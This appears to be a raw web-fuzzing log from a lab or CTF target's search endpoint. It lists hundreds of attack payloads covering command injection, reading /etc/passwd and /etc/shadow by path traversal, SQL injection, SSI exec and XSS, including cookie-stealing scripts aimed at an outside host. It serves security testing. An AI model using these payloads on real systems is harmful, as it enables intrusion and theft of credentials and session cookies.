Target: http://10.10.11.170:8080/search
Total requests: 468
==================================================================
ID    Response   Lines      Word         Chars          Request    
==================================================================
00015:  C=200     28 L	      66 W	    733 Ch	  "-268435455"
00003:  C=200     28 L	      66 W	    728 Ch	  "FALSE"
00043:  C=200     28 L	      66 W	    725 Ch	  "id%00"
00045:  C=200     28 L	      66 W	    726 Ch	  "|id"
00046:  C=200     28 L	      66 W	    727 Ch	  "|dir"
00047:  C=200     28 L	      66 W	    726 Ch	  "|dir|"
00044:  C=200     28 L	      66 W	    725 Ch	  "id%00|"
00007:  C=200     28 L	      66 W	    725 Ch	  "-1"
00031:  C=200     28 L	      66 W	    732 Ch	  "\00\00\00"
00001:  C=200     51 L	     176 W	   2062 Ch	  "A"
00033:  C=200     28 L	      69 W	    755 Ch	  "$NULL"
00030:  C=200     28 L	      66 W	    729 Ch	  "\00\00"
00032:  C=200     28 L	      69 W	    755 Ch	  "$null"
00029:  C=200     28 L	      66 W	    726 Ch	  "\00"
00028:  C=200     28 L	      66 W	    729 Ch	  "\0\0\0"
00027:  C=200     28 L	      66 W	    727 Ch	  "\0\0"
00026:  C=200     28 L	      66 W	    725 Ch	  "\0"
00041:  C=200     28 L	      66 W	    725 Ch	  "|id|"
00036:  C=200     28 L	      66 W	    727 Ch	  ";id;"
00022:  C=200     28 L	      71 W	    758 Ch	  "<  script > < / script>"
00042:  C=200     33 L	      90 W	   1039 Ch	  "&quot;;id&quot;"
00035:  C=200     28 L	      66 W	    728 Ch	  "`dir`"
00038:  C=200     28 L	      67 W	    735 Ch	  ";netstat -a;"
00034:  C=200     28 L	      66 W	    727 Ch	  "`id`"
00018:  C=200     28 L	      66 W	    723 Ch	  "NULL"
00020:  C=200     28 L	      66 W	    725 Ch	  "\0"
00014:  C=200     28 L	      66 W	    732 Ch	  "268435455"
00016:  C=200     28 L	      66 W	    733 Ch	  "2147483647"
00040:  C=200     28 L	      66 W	    734 Ch	  "\"blah"
00012:  C=200     28 L	      66 W	    726 Ch	  "-20"
00011:  C=200     28 L	      66 W	    725 Ch	  "-2"
00010:  C=200     28 L	      66 W	    724 Ch	  "2"
00009:  C=200     28 L	      66 W	    727 Ch	  "-1.0"
00019:  C=200     28 L	      66 W	    723 Ch	  "null"
00008:  C=200     28 L	      66 W	    726 Ch	  "1.0"
00005:  C=200     28 L	      66 W	    724 Ch	  "00"
00037:  C=200     28 L	      66 W	    729 Ch	  ";read;"
00004:  C=200     28 L	      66 W	    724 Ch	  "0"
00048:  C=200     28 L	      66 W	    726 Ch	  "|ls"
00006:  C=200     28 L	      66 W	    724 Ch	  "1"
00054:  C=200     28 L	      66 W	    726 Ch	  "?x="
00017:  C=200     28 L	      66 W	    732 Ch	  "0xfffffff"
00002:  C=200     28 L	      66 W	    727 Ch	  "TRUE"
00021:  C=200     28 L	      66 W	    726 Ch	  "\00"
00057:  C=200     28 L	      66 W	    730 Ch	  "?x=>"
00059:  C=200     28 L	      66 W	    732 Ch	  "/boot.ini"
00050:  C=200     28 L	      67 W	    730 Ch	  ";ls -la"
00064:  C=200     28 L	      66 W	    768 Ch	  "../../../../../../../../../../../../etc/hosts"
00060:  C=200     28 L	      66 W	    734 Ch	  "/etc/passwd"
00061:  C=200     28 L	      66 W	    734 Ch	  "/etc/shadow"
00063:  C=200     28 L	      66 W	    768 Ch	  "../../../../../../../../../../../../etc/hosts%00"
00055:  C=200     28 L	      66 W	    732 Ch	  "?x=""
00056:  C=200     28 L	      66 W	    727 Ch	  "?x=|"
00058:  C=200     28 L	      66 W	    738 Ch	  "/index.html|id|"
00053:  C=200     28 L	      67 W	    738 Ch	  "\n/bin/ls -al\n"
00052:  C=200     28 L	      67 W	    735 Ch	  "|/bin/ls -al"
00051:  C=200     28 L	      66 W	    727 Ch	  ";dir"
00067:  C=200     28 L	      66 W	    769 Ch	  "../../../../../../../../../../../../etc/passwd%00"
00065:  C=200     28 L	      66 W	    737 Ch	  "../../boot.ini"
00049:  C=200     28 L	      67 W	    730 Ch	  "|ls -la"
00095:  C=200     28 L	      66 W	    772 Ch	  "/../../../../../../../../../../../etc/passwd%00.jpg"
00102:  C=200     28 L	      69 W	    755 Ch	  "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
00101:  C=200     28 L	      69 W	    755 Ch	  "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
00100:  C=200     28 L	      66 W	    764 Ch	  "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
00099:  C=200     28 L	      66 W	    764 Ch	  "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
00098:  C=200     28 L	      66 W	    776 Ch	  "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow"
00097:  C=200     28 L	      66 W	    776 Ch	  "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
00096:  C=200     28 L	      66 W	    773 Ch	  "/../../../../../../../../../../../etc/passwd%00.html"
00093:  C=200     28 L	      66 W	    751 Ch	  "%00../../../../../../etc/passwd"
00092:  C=200     28 L	      66 W	    734 Ch	  "%00/etc/shadow%00"
00094:  C=200     28 L	      66 W	    751 Ch	  "%00../../../../../../etc/shadow"
00090:  C=200     28 L	      67 W	    743 Ch	  "%0a/bin/cat%20/etc/shadow"
00085:  C=200     28 L	      66 W	    764 Ch	  "\..\..\..\..\..\..\..\..\..\..\etc\passwd%00"
00091:  C=200     28 L	      66 W	    734 Ch	  "%00/etc/passwd%00"
00079:  C=200     28 L	      66 W	    763 Ch	  "..\..\..\..\..\..\..\..\..\..\etc\passwd"
00071:  C=200     28 L	      66 W	    766 Ch	  "/../../../../../../../../../../etc/passwd^^"
00089:  C=200     28 L	      67 W	    743 Ch	  "%0a/bin/cat%20/etc/passwd"
00088:  C=200     28 L	      66 W	    763 Ch	  "..\..\..\..\..\..\..\..\..\..\etc\shadow%00"
00086:  C=200     28 L	      66 W	    764 Ch	  "\..\..\..\..\..\..\..\..\..\..\etc\shadow%00"
00013:  C=200     28 L	      66 W	    728 Ch	  "65536"
00087:  C=200     28 L	      66 W	    763 Ch	  "..\..\..\..\..\..\..\..\..\..\etc\passwd%00"
00084:  C=200     28 L	      66 W	    757 Ch	  ".\\./.\\./.\\./.\\./.\\./.\\./etc/shadow"
00082:  C=200     28 L	      66 W	    770 Ch	  "/..\../..\../..\../..\../..\../..\../etc/shadow"
00081:  C=200     28 L	      66 W	    770 Ch	  "/..\../..\../..\../..\../..\../..\../etc/passwd"
00083:  C=200     28 L	      66 W	    757 Ch	  ".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
00076:  C=200     28 L	      66 W	    756 Ch	  "/./././././././././././etc/shadow"
00077:  C=200     28 L	      66 W	    764 Ch	  "\..\..\..\..\..\..\..\..\..\..\etc\passwd"
00074:  C=200     28 L	      66 W	    764 Ch	  "/../../../../../../../../../../etc/shadow"
00075:  C=200     28 L	      66 W	    756 Ch	  "/./././././././././././etc/passwd"
00080:  C=200     28 L	      66 W	    763 Ch	  "..\..\..\..\..\..\..\..\..\..\etc\shadow"
00078:  C=200     28 L	      66 W	    764 Ch	  "\..\..\..\..\..\..\..\..\..\..\etc\shadow"
00073:  C=200     28 L	      66 W	    764 Ch	  "/../../../../../../../../../../etc/passwd"
00070:  C=200     28 L	      66 W	    769 Ch	  "../../../../../../../../../../../../etc/shadow"
00072:  C=200     28 L	      66 W	    766 Ch	  "/../../../../../../../../../../etc/shadow^^"
00069:  C=200     28 L	      66 W	    769 Ch	  "../../../../../../../../../../../../etc/shadow%00"
00068:  C=200     28 L	      66 W	    769 Ch	  "../../../../../../../../../../../../etc/passwd"
00066:  C=200     28 L	      66 W	    749 Ch	  "/../../../../../../../../%2A"
00105:  C=200     28 L	      69 W	    755 Ch	  "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini"
00107:  C=200     28 L	      66 W	    724 Ch	  "\\&apos;/bin/cat%20/etc/shadow\\&apos;"
00119:  C=200     28 L	      66 W	    765 Ch	  "/../../../../../../../../../../../boot.ini%00"
00131:  C=200     28 L	      67 W	    754 Ch	  "%0d%0aX-Injection-Header:%20AttackValue"
00111:  C=200     28 L	      66 W	    752 Ch	  "C:\inetpub\wwwroot\global.asa"
00129:  C=200     28 L	      66 W	    773 Ch	  "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini"
00128:  C=200     28 L	      66 W	    744 Ch	  "/.../.../.../.../.../"
00127:  C=200     28 L	      66 W	    770 Ch	  "/../../../../../../../../../../../boot.ini%00.jpg"
00126:  C=200     28 L	      66 W	    771 Ch	  "/../../../../../../../../../../../boot.ini%00.html"
00125:  C=200     28 L	      66 W	    761 Ch	  "..\..\..\..\..\..\..\..\..\..\boot.ini"
00122:  C=200     28 L	      66 W	    756 Ch	  "/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini"
00124:  C=200     28 L	      66 W	    761 Ch	  "..\..\..\..\..\..\..\..\..\..\boot.ini%00"
00123:  C=200     28 L	      66 W	    762 Ch	  "\..\..\..\..\..\..\..\..\..\..\boot.ini"
00121:  C=200     28 L	      66 W	    768 Ch	  "/..\../..\../..\../..\../..\../..\../boot.ini"
00120:  C=200     28 L	      66 W	    765 Ch	  "/../../../../../../../../../../../boot.ini"
00117:  C=200     28 L	      66 W	    767 Ch	  "../../../../../../../../../../../../boot.ini"
00118:  C=200     28 L	      66 W	    754 Ch	  "/./././././././././././boot.ini"
00116:  C=200     28 L	      66 W	    767 Ch	  "../../../../../../../../../../../../boot.ini%00"
00115:  C=200     28 L	      66 W	    773 Ch	  "../../../../../../../../../../../../localstart.asp"
00114:  C=200     28 L	      66 W	    773 Ch	  "../../../../../../../../../../../../localstart.asp%00"
00109:  C=200     28 L	      66 W	    755 Ch	  "/../../../../../../../../bin/id|"
00106:  C=200     28 L	      66 W	    724 Ch	  "\\&apos;/bin/cat%20/etc/passwd\\&apos;"
00110:  C=200     28 L	      66 W	    752 Ch	  "C:/inetpub/wwwroot/global.asa"
00108:  C=200     28 L	      66 W	    762 Ch	  "../../../../../../../../conf/server.xml"
00113:  C=200     28 L	      66 W	    734 Ch	  "C:\boot.ini"
00112:  C=200     28 L	      66 W	    734 Ch	  "C:/boot.ini"
00130:  C=200     28 L	      66 W	    762 Ch	  "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini"
00146:  C=200     28 L	      66 W	    726 Ch	  "\\\\*"
00138:  C=200     28 L	      66 W	    724 Ch	  "#"
00151:  C=200     28 L	      66 W	    727 Ch	  "&LT;"
00150:  C=200     28 L	      66 W	    727 Ch	  "&LT"
00149:  C=200     28 L	      66 W	    727 Ch	  "&lt;"
00148:  C=200     28 L	      66 W	    727 Ch	  "&lt"
00147:  C=200     28 L	      66 W	    727 Ch	  "\\\\?\\"
00142:  C=200     28 L	      66 W	    724 Ch	  "/"
00145:  C=200     28 L	      66 W	    725 Ch	  "\\/"
00139:  C=200     28 L	      66 W	    724 Ch	  "*"
00144:  C=200     28 L	      66 W	    724 Ch	  "\\"
00133:  C=200     28 L	      66 W	    727 Ch	  "%01%02%03%04%0a%0d%0aADSF"
00136:  C=200     28 L	      66 W	    727 Ch	  "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;"
00135:  C=200     28 L	      66 W	    727 Ch	  "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;"
00141:  C=200     28 L	      66 W	    724 Ch	  ";"
00154:  C=200     28 L	      66 W	    735 Ch	  "<<<"
00158:  C=200     28 L	      66 W	    724 Ch	  "-"
00166:  C=200     28 L	      66 W	    730 Ch	  "{'}"
00172:  C=200     28 L	      66 W	    727 Ch	  "%01%02%03%04%0a%0d%0aADSF"
00173:  C=200     28 L	      66 W	    725 Ch	  "\t"
00152:  C=200     28 L	      66 W	    727 Ch	  "<"
00170:  C=200     28 L	      66 W	    729 Ch	  "!'"
00169:  C=200     28 L	      66 W	    729 Ch	  "#'"
00168:  C=200     28 L	      66 W	    729 Ch	  "*'"
00167:  C=200     28 L	      66 W	    730 Ch	  "[']"
00174:  C=200     28 L	      66 W	    737 Ch	  ""\t""
00175:  C=200     28 L	      66 W	    727 Ch	  "&#10;"
00163:  C=200     28 L	      66 W	    729 Ch	  "/'"
00164:  C=200     28 L	      66 W	    729 Ch	  "@'"
00161:  C=200     28 L	      66 W	    729 Ch	  "^'"
00157:  C=200     28 L	      66 W	    724 Ch	  "`"
00159:  C=200     28 L	      66 W	    725 Ch	  "--"
00153:  C=200     28 L	      66 W	    731 Ch	  "<<"
00156:  C=200     28 L	      66 W	    725 Ch	  "||"
00155:  C=200     28 L	      66 W	    724 Ch	  "|"
00176:  C=200     28 L	      66 W	    727 Ch	  "&#13;"
00160:  C=200     28 L	      66 W	    725 Ch	  "*|"
00182:  C=200     28 L	      66 W	    729 Ch	  "#xA#xD"
00178:  C=200     28 L	      66 W	    727 Ch	  "&#13;&#10;"
00200:  C=200     28 L	      69 W	    755 Ch	  "%2500"
00198:  C=200     28 L	      66 W	    724 Ch	  "%20|"
00194:  C=200     28 L	      66 W	    725 Ch	  "/%2A"
00192:  C=200     28 L	      66 W	    724 Ch	  "%7C"
00199:  C=200     28 L	      69 W	    755 Ch	  "%250a"
00195:  C=200     28 L	      66 W	    724 Ch	  "%2A"
00196:  C=200     28 L	      66 W	    724 Ch	  "%2C"
00188:  C=200     28 L	      66 W	    728 Ch	  "%3C%3F"
00187:  C=200     28 L	      66 W	    727 Ch	  "%3C"
00186:  C=200     28 L	      66 W	    728 Ch	  "<?"
00191:  C=200     28 L	      66 W	    725 Ch	  "%5C/"
00180:  C=200     28 L	      66 W	    726 Ch	  "#xA"
00184:  C=200     28 L	      66 W	    724 Ch	  "%00/"
00179:  C=200     28 L	      66 W	    726 Ch	  "#xD"
00177:  C=200     28 L	      66 W	    727 Ch	  "&#10;&#13;"
00201:  C=200     28 L	      66 W	    726 Ch	  "../"
00181:  C=200     28 L	      66 W	    729 Ch	  "#xD#xA"
00189:  C=200     28 L	      66 W	    724 Ch	  "%60"
00215:  C=200     28 L	      66 W	    727 Ch	  "&#0060"
00225:  C=200     28 L	      66 W	    727 Ch	  "&#x3c"
00219:  C=200     28 L	      66 W	    727 Ch	  "&#60;"
00224:  C=200     28 L	      66 W	    727 Ch	  "&#0000060;"
00222:  C=200     28 L	      66 W	    727 Ch	  "&#00060;"
00220:  C=200     28 L	      66 W	    727 Ch	  "&#060;"
00183:  C=200     28 L	      66 W	    726 Ch	  "/%00/"
00218:  C=200     33 L	      90 W	   1039 Ch	  "&#0000060"
00214:  C=200     33 L	      90 W	   1039 Ch	  "&#060"
00216:  C=200     33 L	      90 W	   1039 Ch	  "&#00060"
00213:  C=200     33 L	      90 W	   1039 Ch	  "&#60"
00221:  C=200     33 L	      90 W	   1039 Ch	  "&#0060;"
00217:  C=200     33 L	      90 W	   1039 Ch	  "&#000060"
00211:  C=200     28 L	      69 W	    755 Ch	  "..%25%35%63"
00223:  C=200     33 L	      90 W	   1039 Ch	  "&#000060;"
00228:  C=200     33 L	      90 W	   1039 Ch	  "&#x0003c"
00240:  C=200     33 L	      90 W	   1039 Ch	  "&#X0003c"
00209:  C=200     28 L	      69 W	    755 Ch	  "..%255c"
00202:  C=200     28 L	      66 W	    726 Ch	  "%2e%2e%2f"
00204:  C=200     28 L	      66 W	    727 Ch	  "..%c0%af"
00232:  C=200     33 L	      90 W	   1039 Ch	  "&#x03c;"
00226:  C=200     33 L	      90 W	   1039 Ch	  "&#x03c"
00249:  C=200     33 L	      90 W	   1039 Ch	  "&#x3C"
00248:  C=200     33 L	      90 W	   1039 Ch	  "&#X000003c;"
00246:  C=200     33 L	      90 W	   1039 Ch	  "&#X0003c;"
00247:  C=200     33 L	      90 W	   1039 Ch	  "&#X00003c;"
00244:  C=200     33 L	      90 W	   1039 Ch	  "&#X03c;"
00241:  C=200     33 L	      90 W	   1039 Ch	  "&#X00003c"
00238:  C=200     33 L	      90 W	   1039 Ch	  "&#X03c"
00243:  C=200     33 L	      90 W	   1039 Ch	  "&#X3c;"
00237:  C=200     33 L	      90 W	   1039 Ch	  "&#X3c"
00242:  C=200     33 L	      90 W	   1039 Ch	  "&#X000003c"
00231:  C=200     33 L	      90 W	   1039 Ch	  "&#x3c;"
00239:  C=200     33 L	      90 W	   1039 Ch	  "&#X003c"
00245:  C=200     33 L	      90 W	   1039 Ch	  "&#X003c;"
00229:  C=200     33 L	      90 W	   1039 Ch	  "&#x00003c"
00234:  C=200     33 L	      90 W	   1039 Ch	  "&#x0003c;"
00233:  C=200     33 L	      90 W	   1039 Ch	  "&#x003c;"
00252:  C=200     33 L	      90 W	   1039 Ch	  "&#x0003C"
00230:  C=200     33 L	      90 W	   1039 Ch	  "&#x000003c"
00293:  C=200     28 L	      66 W	    784 Ch	  "'><script>alert(document.cookie);</script>"
00236:  C=200     33 L	      90 W	   1039 Ch	  "&#x000003c;"
00250:  C=200     33 L	      90 W	   1039 Ch	  "&#x03C"
00227:  C=200     33 L	      90 W	   1039 Ch	  "&#x003c"
00235:  C=200     33 L	      90 W	   1039 Ch	  "&#x00003c;"
00292:  C=200     28 L	      66 W	    783 Ch	  "'><script>alert(document.cookie)</script>"
00294:  C=200     28 L	      66 W	    754 Ch	  "\";alert('XSS');//"
00256:  C=200     33 L	      90 W	   1039 Ch	  "&#x03C;"
00264:  C=200     33 L	      90 W	   1039 Ch	  "&#X0003C"
00291:  C=200     28 L	      66 W	    774 Ch	  "<script>alert(document.cookie)</script>"
00289:  C=200     28 L	      66 W	    774 Ch	  "<script>alert("XSS")</script>"
00290:  C=200     28 L	      66 W	    785 Ch	  "<<script>alert("XSS");//<</script>"
00288:  C=200     28 L	      66 W	    753 Ch	  ""><script>""
00287:  C=200     28 L	      66 W	    748 Ch	  "">xxx<P>yyy"
00278:  C=200     33 L	      90 W	   1039 Ch	  "&apos;"
00286:  C=200     28 L	      66 W	    724 Ch	  "#&apos;"
00279:  C=200     28 L	      66 W	    724 Ch	  "/&apos;"
00285:  C=200     28 L	      66 W	    724 Ch	  "*&apos;"
00284:  C=200     28 L	      66 W	    724 Ch	  "[&apos;]"
00282:  C=200     28 L	      66 W	    724 Ch	  "@&apos;"
00281:  C=200     28 L	      66 W	    724 Ch	  "^&apos;"
00277:  C=200     28 L	      66 W	    737 Ch	  "something%00html"
00276:  C=200     28 L	      66 W	    729 Ch	  "\u003C"
00275:  C=200     28 L	      66 W	    729 Ch	  "\u003c"
00269:  C=200     33 L	      90 W	   1039 Ch	  "&#X003C;"
00266:  C=200     33 L	      90 W	   1039 Ch	  "&#X000003C"
00271:  C=200     33 L	      90 W	   1039 Ch	  "&#X00003C;"
00268:  C=200     33 L	      90 W	   1039 Ch	  "&#X03C;"
00274:  C=200     28 L	      66 W	    727 Ch	  "\x3C"
00273:  C=200     28 L	      66 W	    727 Ch	  "\x3c"
00270:  C=200     33 L	      90 W	   1039 Ch	  "&#X0003C;"
00258:  C=200     33 L	      90 W	   1039 Ch	  "&#x0003C;"
00267:  C=200     33 L	      90 W	   1039 Ch	  "&#X3C;"
00255:  C=200     33 L	      90 W	   1039 Ch	  "&#x3C;"
00262:  C=200     33 L	      90 W	   1039 Ch	  "&#X03C"
00263:  C=200     33 L	      90 W	   1039 Ch	  "&#X003C"
00265:  C=200     33 L	      90 W	   1039 Ch	  "&#X00003C"
00261:  C=200     33 L	      90 W	   1039 Ch	  "&#X3C"
00260:  C=200     33 L	      90 W	   1039 Ch	  "&#x000003C;"
00259:  C=200     33 L	      90 W	   1039 Ch	  "&#x00003C;"
00272:  C=200     33 L	      90 W	   1039 Ch	  "&#X000003C;"
00318:  C=200     28 L	      67 W	    821 Ch	  "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>"
00295:  C=200     28 L	      66 W	    775 Ch	  "%3cscript%3ealert("XSS");%3c/script%3e"
00251:  C=200     33 L	      90 W	   1039 Ch	  "&#x003C"
00253:  C=200     33 L	      90 W	   1039 Ch	  "&#x00003C"
00319:  C=200     28 L	      67 W	    735 Ch	  "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"
00309:  C=200     28 L	      67 W	    786 Ch	  "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>"
00257:  C=200     28 L	      66 W	    727 Ch	  "&#x003C;"
00297:  C=200     28 L	      67 W	    776 Ch	  "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E"
00254:  C=200     33 L	      90 W	   1039 Ch	  "&#x000003C"
00301:  C=200     28 L	      67 W	    782 Ch	  "<IMG%20SRC='javascript:alert(document.cookie)'>"
00317:  C=200     28 L	      67 W	    785 Ch	  "<IMG LOWSRC="javascript:alert('XSS')">"
00315:  C=200     28 L	      67 W	    741 Ch	  "<IMG SRC=" &#14;  javascript:alert('XSS');">"
00314:  C=200     28 L	      67 W	    744 Ch	  "<IMG SRC="jav&#x0D;ascript:alert('XSS');">"
00312:  C=200     28 L	      67 W	    744 Ch	  "<IMG SRC="jav&#x09;ascript:alert('XSS');">"
00316:  C=200     28 L	      67 W	    785 Ch	  "<IMG DYNSRC="javascript:alert('XSS')">"
00313:  C=200     28 L	      67 W	    744 Ch	  "<IMG SRC="jav&#x0A;ascript:alert('XSS');">"
00310:  C=200     28 L	      68 W	    783 Ch	  "<IMG%20SRC='javasc	ript:alert(document.cookie)'>"
00308:  C=200     28 L	      67 W	    814 Ch	  "<IMG """><SCRIPT>alert("XSS")</SCRIPT>">"
00311:  C=200     28 L	      68 W	    784 Ch	  "<IMG SRC="jav	ascript:alert('XSS');">"
00307:  C=200     28 L	      67 W	    784 Ch	  "<IMG SRC=`javascript:alert("'XSS'")`>"
00306:  C=200     28 L	      67 W	    752 Ch	  "<IMG SRC=javascript:alert(&quot;XSS&quot;)>"
00304:  C=200     28 L	      67 W	    770 Ch	  "<IMG SRC=javascript:alert('XSS')>"
00303:  C=200     28 L	      67 W	    778 Ch	  "<IMG SRC="javascript:alert('XSS')""
00300:  C=200     28 L	      66 W	    802 Ch	  "<xss><script>alert('XSS')</script></vulnerable>"
00296:  C=200     28 L	      66 W	    775 Ch	  "%3cscript%3ealert(document.cookie);%3c%2fscript%3e"
00302:  C=200     28 L	      67 W	    783 Ch	  "<IMG SRC="javascript:alert('XSS');">"
00299:  C=200     28 L	      66 W	    727 Ch	  "&ltscript&gtalert(document.cookie);&ltscript&gtalert"
00305:  C=200     28 L	      67 W	    770 Ch	  "<IMG SRC=JaVaScRiPt:alert('XSS')>"
00320:  C=200     28 L	      67 W	    735 Ch	  "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>"
00322:  C=200     28 L	      69 W	    755 Ch	  "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E"
00326:  C=200     28 L	      66 W	    755 Ch	  "'';!--"<XSS>=&{()}"
00334:  C=200     28 L	      66 W	    731 Ch	  "--';"
00365:  C=200     28 L	      68 W	    732 Ch	  "or%201=1 --"
00366:  C=200     28 L	      70 W	    755 Ch	  "' or 1=1 or ''='"
00364:  C=200     28 L	      67 W	    729 Ch	  "or%201=1"
00298:  C=200     28 L	      66 W	    727 Ch	  "&ltscript&gtalert(document.cookie);</script>"
00363:  C=200     28 L	      67 W	    731 Ch	  "or 1=1--"
00350:  C=200     28 L	      68 W	    754 Ch	  "" or "x"="x"
00361:  C=200     28 L	      68 W	    757 Ch	  "' or '1'='1'--"
00360:  C=200     28 L	      68 W	    738 Ch	  "" or 1=1--"
00358:  C=200     28 L	      68 W	    731 Ch	  "or 0=0 #"
00359:  C=200     28 L	      68 W	    737 Ch	  "' or 1=1--"
00357:  C=200     28 L	      69 W	    738 Ch	  "" or 0=0 #"
00362:  C=200     28 L	      69 W	    753 Ch	  ""' or 1 --'""
00356:  C=200     28 L	      69 W	    737 Ch	  "' or 0=0 #"
00355:  C=200     28 L	      68 W	    732 Ch	  "or 0=0 --"
00354:  C=200     28 L	      69 W	    739 Ch	  "" or 0=0 --"
00352:  C=200     28 L	      68 W	    731 Ch	  "0 or 1=1"
00349:  C=200     28 L	      68 W	    750 Ch	  "' or 'x'='x"
00351:  C=200     28 L	      68 W	    752 Ch	  "') or ('x'='x"
00348:  C=200     28 L	      68 W	    748 Ch	  "' or ''='"
00353:  C=200     28 L	      69 W	    738 Ch	  "' or 0=0 --"
00344:  C=200     28 L	      68 W	    744 Ch	  "\x27\x6F\x72 SELECT *"
00346:  C=200     28 L	      66 W	    735 Ch	  "admin'--"
00343:  C=200     28 L	      68 W	    744 Ch	  "\x27\x4F\x52 SELECT *"
00341:  C=200     28 L	      67 W	    737 Ch	  "\x3D \x3B'"
00342:  C=200     28 L	      67 W	    732 Ch	  "\x3D \x27"
00340:  C=200     28 L	      66 W	    727 Ch	  "\x27"
00345:  C=200     28 L	      68 W	    739 Ch	  "'or select *"
00337:  C=200     28 L	      67 W	    726 Ch	  "= ;"
00333:  C=200     28 L	      67 W	    731 Ch	  "' --"
00335:  C=200     28 L	      67 W	    730 Ch	  "' ;"
00331:  C=200     28 L	      66 W	    724 Ch	  "-"
00336:  C=200     28 L	      67 W	    730 Ch	  "= '"
00332:  C=200     28 L	      66 W	    725 Ch	  "--"
00339:  C=200     28 L	      66 W	    727 Ch	  "\x23"
00338:  C=200     28 L	      67 W	    727 Ch	  "= --"
00329:  C=200     28 L	      66 W	    729 Ch	  """
00330:  C=200     28 L	      66 W	    724 Ch	  "#"
00323:  C=200     28 L	      67 W	    846 Ch	  ""><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>"
00327:  C=200     28 L	      66 W	    727 Ch	  "http://10.10.11.170:8080/search"
00324:  C=200     28 L	      67 W	    847 Ch	  "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E"
00321:  C=200     28 L	      67 W	    735 Ch	  "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"
00367:  C=200     28 L	      70 W	    759 Ch	  "" or 1=1 or ""=""
00369:  C=200     28 L	      68 W	    754 Ch	  "" or "a"="a"
00328:  C=200     28 L	      66 W	    728 Ch	  "'"
00381:  C=200     28 L	      66 W	    728 Ch	  "PRINT"
00391:  C=200     28 L	      66 W	    727 Ch	  "desc"
00385:  C=200     28 L	      66 W	    725 Ch	  "as"
00386:  C=200     28 L	      66 W	    725 Ch	  "or"
00389:  C=200     28 L	      67 W	    731 Ch	  "order by"
00387:  C=200     28 L	      66 W	    732 Ch	  "procedure"
00373:  C=200     28 L	      69 W	    741 Ch	  "hi" or 1=1 --"
00384:  C=200     28 L	      66 W	    729 Ch	  "insert"
00390:  C=200     28 L	      66 W	    726 Ch	  "asc"
00388:  C=200     28 L	      66 W	    728 Ch	  "limit"
00382:  C=200     28 L	      67 W	    739 Ch	  "PRINT @@variable"
00379:  C=200     28 L	      66 W	    732 Ch	  "@variable"
00380:  C=200     28 L	      66 W	    733 Ch	  ",@variable"
00378:  C=200     28 L	      68 W	    763 Ch	  "'hi' or 'x'='x';"
00383:  C=200     28 L	      66 W	    729 Ch	  "select"
00376:  C=200     28 L	      68 W	    754 Ch	  "hi') or ('a'='a"
00375:  C=200     28 L	      68 W	    752 Ch	  "hi' or 'a'='a"
00377:  C=200     28 L	      68 W	    758 Ch	  "hi") or ("a"="a"
00370:  C=200     28 L	      68 W	    752 Ch	  "') or ('a'='a"
00374:  C=200     28 L	      69 W	    740 Ch	  "hi' or 1=1 --"
00371:  C=200     28 L	      68 W	    756 Ch	  "") or ("a"="a"
00368:  C=200     28 L	      68 W	    737 Ch	  "' or a=a--"
00392:  C=200     28 L	      66 W	    729 Ch	  "delete"
00394:  C=200     28 L	      66 W	    731 Ch	  "distinct"
00398:  C=200     28 L	      66 W	    727 Ch	  "like"
00372:  C=200     28 L	      68 W	    756 Ch	  "hi" or "a"="a"
00419:  C=200     28 L	      69 W	    755 Ch	  "to_timestamp_tz"
00415:  C=200     28 L	      67 W	    738 Ch	  "' or (EXISTS)"
00418:  C=200     28 L	      67 W	    733 Ch	  "1;SELECT%20*"
00417:  C=200     28 L	      69 W	    755 Ch	  "'||UTL_HTTP.REQUEST"
00416:  C=200     28 L	      69 W	    742 Ch	  "' (select top 1"
00414:  C=200     28 L	      69 W	    745 Ch	  "' UNION ALL SELECT"
00406:  C=200     28 L	      67 W	    730 Ch	  "exec xp"
00412:  C=200     28 L	      67 W	    739 Ch	  "\x27UNION SELECT"
